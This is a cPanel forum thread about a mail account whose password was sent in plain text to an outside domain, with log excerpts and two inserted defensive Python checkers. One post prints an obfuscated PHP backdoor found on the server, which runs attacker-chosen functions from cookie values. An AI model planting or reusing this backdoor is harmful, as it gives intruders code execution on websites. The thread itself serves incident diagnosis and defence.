Bounced Email with Password in Plain Text

jimhermann

Well-Known Member
Jan 20, 2008
Folks,

I received a bounced email that contained the account email address and password in Plain Text.

Did the Sender hack the account password and send themselves an email with the email address and password?

The original email came from my account: [email protected]
However, the IP Address was in Poland and the To Address was in Russian.

2020-12-16 13:42:01 1kpcgS-0000lp-Si <= [email protected] H=(127.0.0.1) [213.92.204.4]:36457 P=esmtpsa X=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256 CV=no A=dovecot_plain:[email protected] S=476 T="invoice for NL3252324" for [email protected]
2020-12-16 13:42:01 1kpcgS-0000lp-Si SMTP connection outbound 1608147721 1kpcgS-0000lp-Si domainname.com info1big@supportwebarh.info
2020-12-16 13:44:08 1kpcgS-0000lp-Si H=supportwebarh.info [178.132.201.122] Connection timed out

The original email contained:

Return-path: <[email protected]>
Received: from [213.92.204.4] (port=36457 helo=127.0.0.1)
by host3.uuserver.net with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
(Exim 4.93)
(envelope-from <[email protected]>)
id 1kpcgS-0000lp-Si
for [email protected]; Wed, 16 Dec 2020 13:42:01 -0600
X-mailer: Apple Mail (2.3273)
Subject: invoice for NL3252324
Date: Wed, 16 Dec 2020 20:42:03 +0100

[email protected]:[email protected]:PASSWORD:mail.domainname.com:465

I did not find any additional activity for IP Address 213.92.204.4 or domain name supportwebarh.info

Thanks,

Jim
 
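As an added example (not from the thread), a small Python checker for Exim mainlog lines in the format quoted above. Two signals in that first "<=" line say the message was submitted with the account's own credentials rather than by the owner's mail client: SMTP AUTH (A=dovecot_plain:...) from an address outside the owner's usual networks, and a HELO of 127.0.0.1 arriving from a public IP. The sample lines, the local part `user` and the trusted network 192.0.2.0/24 are constructed placeholders.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample in the Exim mainlog format quoted in the post: line 1 mirrors the abusive
# submission, line 2 is a made-up legitimate one; the local part "user" is a placeholder.
SAMPLE_LOG = """\
2020-12-16 13:42:01 1kpcgS-0000lp-Si <= user@domainname.com H=(127.0.0.1) [213.92.204.4]:36457 P=esmtpsa X=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256 CV=no A=dovecot_plain:user@domainname.com S=476 T="invoice for NL3252324" for info1big@supportwebarh.info
2020-12-16 14:05:11 1kpd2x-0001Ab-Qq <= user@domainname.com H=(laptop.lan) [192.0.2.10]:51234 P=esmtpsa X=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256 CV=no A=dovecot_plain:user@domainname.com S=1200 T="Monthly report" for colleague@example.net
"""
# Networks the mailbox owner is expected to submit from (assumed; the admin fills this in).
TRUSTED_NETS = [ip_network("192.0.2.0/24")]

# An Exim "<=" arrival line carrying A=<authenticator>:<user> means SMTP AUTH succeeded.
ARRIVAL = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<id>\S+) <= (?P<sender>\S+) "
    r"H=(?:(?P<host>[^\s(]+) )?\((?P<helo>[^)]*)\) \[(?P<ip>[^\]]+)\]:\d+ .*? A=(?P<auth>\S+)"
)

def parse_submission(line):
    """Fields of an authenticated-submission line, or None for any other line."""
    m = ARRIVAL.search(line)
    if not m:
        return None
    sub = m.groupdict()
    sub["auth_user"] = sub["auth"].partition(":")[2]  # "dovecot_plain:user@..." -> "user@..."
    rcpt = re.search(r" for (\S+)$", line)
    sub["rcpt"] = rcpt.group(1) if rcpt else ""
    return sub
def suspicious_reasons(sub, trusted_nets):
    """Why this submission deserves a password reset and a closer look (empty if nothing)."""
    reasons = []
    src = ip_address(sub["ip"])
    if not any(src in net for net in trusted_nets):
        reasons.append(f"SMTP AUTH as {sub['auth_user']} from untrusted source {src}")
    try:
        helo = ip_address(sub["helo"])
        # Greeting as loopback/private while connecting from the public internet is a HELO lie.
        if (helo.is_loopback or helo.is_private) and src.is_global:
            reasons.append(f"HELO claims {helo} but connection came from {src}")
    except ValueError:
        pass  # HELO was a hostname; nothing to compare with the peer address
    return reasons
def audit_submissions(log_text, trusted_nets=TRUSTED_NETS):
    findings = []
    for line in log_text.splitlines():
        sub = parse_submission(line)
        if sub and (reasons := suspicious_reasons(sub, trusted_nets)):
            findings.append({"id": sub["id"], "ip": sub["ip"], "auth_user": sub["auth_user"],
                             "rcpt": sub["rcpt"], "reasons": reasons})
    return findings
```

Run it against /var/log/exim_mainlog with the real customer ranges in TRUSTED_NETS; every finding names the authenticated mailbox whose password should be rotated.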

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
cPanel Access Level
Root Administrator
Hey there! Sorry to hear about this, and as you suspect, it seems like some type of compromise as cPanel never stores the passwords in plain text anywhere on the system. You'll want to have an admin review the security of the system, change the user and email passwords, and also possibly have any users with access to that cPanel account or email address scan their personal machines to ensure there is no malware present on those systems.
 

jimhermann

Well-Known Member
Jan 20, 2008
The compromised email address was never used as a username for other sites.

It appears that the encrypted password was hacked from a commercial site back in 2017. They must have been running a program to decipher the password since then.

They must have connected the email address for [email protected] with [email protected]. The passwords were the same.

I changed all the passwords and found one suspect PHP script: index547c5a.php

<?php
if(isset($_POST['check_it_script'])){echo 'it true work'; exit();}
if(isset($_COOKIE)){$p=$_COOKIE;(count($p)==31&&in_array(gettype($p).count($p),$p))?(($p[13]=$p[13].$p[46])&&($p[54]=$p[13]($p[54]))&&($p=$p[54]($p[68],$p[13]($p[23])))&&$p()):$p;}
?>

I don't know what this code does.

Any ideas?

Jim
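An added, illustrative detector (not the project's code, and not an analysis the forum itself provides) that scores PHP files for the traits visible in index547c5a.php: a request superglobal copied wholesale into a variable, array elements used as function names, a variable invoked with no arguments, a ternary with a no-op branch, and a POST-keyed liveness probe that prints a fixed reply and exits. The indicator weights and threshold are assumptions, and the benign control file is constructed.

```python
import re

# The suspicious index547c5a.php from the post (wrapped lines joined), used here as sample input.
SUSPECT_PHP = r"""<?php
if(isset($_POST['check_it_script'])){echo 'it true work'; exit();}
if(isset($_COOKIE)){$p=$_COOKIE;(count($p)==31&&in_array(gettype($p).count($p),$p))?(($p[13]=$p[13].$p[46])&&($p[54]=$p[13]($p[54]))&&($p=$p[54]($p[68],$p[13]($p[23])))&&$p()):$p;}
?>"""

# Constructed benign control: reads one cookie the ordinary way and never calls anything dynamically.
BENIGN_PHP = r"""<?php
$lang = isset($_COOKIE['lang']) ? htmlspecialchars($_COOKIE['lang']) : 'en';
echo "<p>Language: $lang</p>";
?>"""

# Hypothetical indicator set and weights; each pattern is a trait visible in the script above.
INDICATORS = {
    # whole request superglobal copied into a variable: attacker-controlled input becomes program data
    "superglobal_copied":  (re.compile(r"\$\w+\s*=\s*\$_(?:COOKIE|POST|GET|REQUEST)\s*;"), 2),
    # an array element used as a function name, e.g. $p[13](...): PHP variable-function abuse
    "element_called":      (re.compile(r"\$\w+\[[^\]]+\]\s*\("), 3),
    # a bare variable invoked with no arguments, e.g. $p()
    "variable_called":     (re.compile(r"\$\w+\s*\(\s*\)"), 2),
    # ternary whose false branch is just the variable (a no-op branch that hides control flow)
    "noop_ternary_branch": (re.compile(r":\s*\$\w+\s*;"), 1),
    # "is the implant alive?" probe: POST key checked, fixed reply printed, then exit()
    "liveness_probe":      (re.compile(r"isset\(\$_POST\[[^\]]+\]\)\)\s*\{[^}]*exit\(\)"), 2),
}
SUSPICIOUS_THRESHOLD = 5

def score_php(source):
    """Return (score, {indicator: hit_count}) for one PHP source text."""
    hits = {name: len(pat.findall(source)) for name, (pat, _) in INDICATORS.items()}
    hits = {k: v for k, v in hits.items() if v}
    score = sum(INDICATORS[k][1] * v for k, v in hits.items())
    return score, hits

def classify(source):
    """'suspicious' when enough weighted indicators co-occur, else 'clean'."""
    score, _ = score_php(source)
    return "suspicious" if score >= SUSPICIOUS_THRESHOLD else "clean"

if __name__ == "__main__":
    for label, src in (("index547c5a.php", SUSPECT_PHP), ("benign.php", BENIGN_PHP)):
        print(label, classify(src), score_php(src)[1])
```

A hit on "element_called" or "variable_called" alone is worth a manual read even below the threshold, since legitimate site code rarely builds function names out of request data.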
 

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
cPanel Access Level
Root Administrator
It definitely looks suspicious with the cookie values and the name "check_it_script", but I'm not a PHP developer, so I'm not 100% certain what that is trying to achieve. It definitely seems like you've found the root of the issue though.
 

Metro2

Well-Known Member
May 24, 2006
USA
cPanel Access Level
Root Administrator
I know this thread is a little old, but I just wanted to comment since this same kind of situation recently occurred with one of my customers (but there was no local compromise at the server level / no suspicious files / no infected files in the user's hosting account).

Short version - a few bounced emails were actually sent from the user's email address to an address @supportwebarh.info, and of course the user did not send them. I happened to notice the bounces sitting in the mail queue because I check it daily on all servers. I immediately contacted the customer, ran CXS scans on his hosting account (and did a visual / manual examination of his site files) and helped him scan his computers for viruses and malware. His hosting account was clean, no foreign cPanel logins, no direct POP logins from any foreign IP addresses. Only the password that was exposed in plain text from his email account to an address @supportwebarh.info. After making sure everything was secure at server level (changed his email password of course, and cPanel password just in case, ran scans on server and his computers, etc.; all clean) the only thing that we could narrow it down to was a very old password that he had used on some other email accounts and sites around the web, and ultimately it appears that was either the result of an old breach at one of the several sites / sources I could see for his email account on haveibeenpwned, and the fact that he did not have any security running on his mobile devices. While this isn't "ultimate" proof that there wasn't another type of compromise, based on all the procedures I performed with the user it seems very likely that his phone was involved and that it was a password that he should have changed a long time ago on his email account and on a remote mail account from one of the big popular webmail services. (Thankfully he had changed it everywhere else).

I know that wasn't exactly short, but it was the shortest version to add this comment, and to point out that in an almost exact case for one of my customers, the compromise was not at the server or hosting account level at all. It really came down to him using the same password on a few remote / external accounts and not changing it after known breaches at other / big companies, possibly combined with the fact that he was not keeping his mobile devices secured. So while there isn't "total proof", it's a pretty solid case that it was due to an old breach of an old password he'd used on a couple of other services, and a solid case that it had nothing at all to do with cPanel nor his hosting account nor his site or the server.

Definitely a solid case for what everyone should already be putting in practice - update old passwords (even on accounts/sites "not used in years") and don't use the same password on any two accounts or sites. With all of the password generator / keeper programs available these days, it's really not that hard.
 